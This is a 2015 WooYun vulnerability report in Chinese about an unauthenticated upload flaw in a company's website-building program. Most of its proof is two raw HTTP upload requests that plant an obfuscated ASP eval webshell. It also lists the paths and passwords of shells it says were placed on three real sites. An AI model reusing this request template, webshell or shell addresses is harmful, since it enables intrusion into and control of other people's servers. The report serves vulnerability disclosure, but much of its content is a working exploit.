当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089352

漏洞标题:某企业建站程序通用上传漏洞无需登录直接getshell

相关厂商:一诺互联

漏洞作者: Ch丶0nly

提交时间:2015-01-04 12:36

修复时间:2015-04-04 12:38

公开时间:2015-04-04 12:38

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某企业建站程序通用上传漏洞无需登录直接getshell

详细说明:

某企业建站程序通用上传漏洞无需登录直接getshell
http://www.ynhl.net一诺互联是一家规模挺大的企业建站公司 案例有上万家网站(所以该漏洞是影响极大的)
更多案例请参考:http://www.ynhl.net/case/

漏洞证明:

问题出在网站程序上的一个上传 更多案例请参考:http://www.ynhl.net/case/
下面拿官网演示http://www.ynhl.net
漏洞地址:http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
上传过滤不全导致任意上传文件 前提是主要把目标站加入可信站点才能上传文件

t0155024de741219033.jpg


然后上传文件使用burp抓包
http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
修改该处图片类型为asp

t010d570da69ef58394.jpg


附数据包:

POST /admin/fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de2902b3015a
Accept-Encoding: gzip, deflate
Host: www.ynhl.net
Content-Length: 828
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDSCRQDTRR=BJCDJKGDHMFDAAKLGFHONOKE; bdshare_firstime=1419171865847; ASPSESSIONIDAASQCRST=MOGFKEJDPIKEBEFGJPCEFHPL; ASPSESSIONIDCARRCTTS=GAJPMOLDEIDBNGOCLGJECFPC; CNZZDATA5076377=cnzz_eid%3D1944653864-1419168501-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1419215083
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\asp.asp"
Content-Type: text/plain
1<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="Submit"
¿ªÊ¼ÉÏ´«
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de2902b3015a--


t010d570da69ef58394.jpg


如上图已经看到上传成功了 http://www.ynhl.net/admin/tp/asp0.asp 密码-7
http://www.bohome.cn/admin/tp/1111.asp 密码cai

1.jpg


http://www.lubeian.com.cn/tp/1111.asp 密码-7

1.jpg


POST /fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.lubeian.com.cn/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3d83a290590
Accept-Encoding: gzip, deflate
Host: www.lubeian.com.cn
Content-Length: 835
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDASTQBBAB=CPIBHBABLCDPDAFFBEJKMOJE
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\1111.asp"
Content-Type: text/plain
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="Submit"
¿ªÊ¼ÉÏ´«
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de3d83a290590--


更多案例请参考:http://www.ynhl.net/case/

修复方案:

过滤

版权声明:转载请注明来源 Ch丶0nly@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝